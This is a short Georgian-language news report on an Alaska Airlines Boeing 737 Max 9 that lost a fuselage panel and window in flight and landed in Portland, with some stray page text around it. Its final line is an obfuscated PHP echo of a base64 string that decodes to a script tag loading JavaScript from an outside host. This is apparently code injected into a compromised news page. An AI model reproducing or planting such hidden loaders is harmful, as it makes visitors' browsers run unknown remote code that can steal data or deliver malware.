celsiusi
ავერსი შნაიდერი

„ალასკის ავიახაზების“ სამგზავრო თვითმფრინავს რეისის შესრულების დროს კორპუსის ნაწილი და ფანჯარა მოსძვრა. შემთხვევის შემდეგ თვითმფრინავი პორტლენდში ავარიულად დაეშვა.

„ალასკის ავიახაზების“ კუთვნილი Boeing 737 Max 9 კალიფორნიაში ასრულებდა რეისს, როდესაც გაფრენიდან 35 წუთში მას გარე კოპუსის ნაწილი ფანჯარასთან ერთად მოსძვრა.

შემთხვევის დროს თვითმფრინავი 4 876 მეტრის სიმაღლეზე მიფრინავდა. ბორტზე 177 მგზავრი და ეკიპაჟის ექვსი წევრი იმყოფებოდნენ.

ავიაკომპანიაში განაცხადეს, რომ დროებით შეაჩერებენ კომპანიის კუთვნილი Boeing 737 Max 9-ის ტიპის 65 თვითმფრინავის გამოყენებას, რათა შემოწმება ჩაუტარონ ლაინერებს. თავის მხრივ, კომპანია Boeing-მა გამოძიებაში დახმარების მზადყოფნა გამოთქვა.

236
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");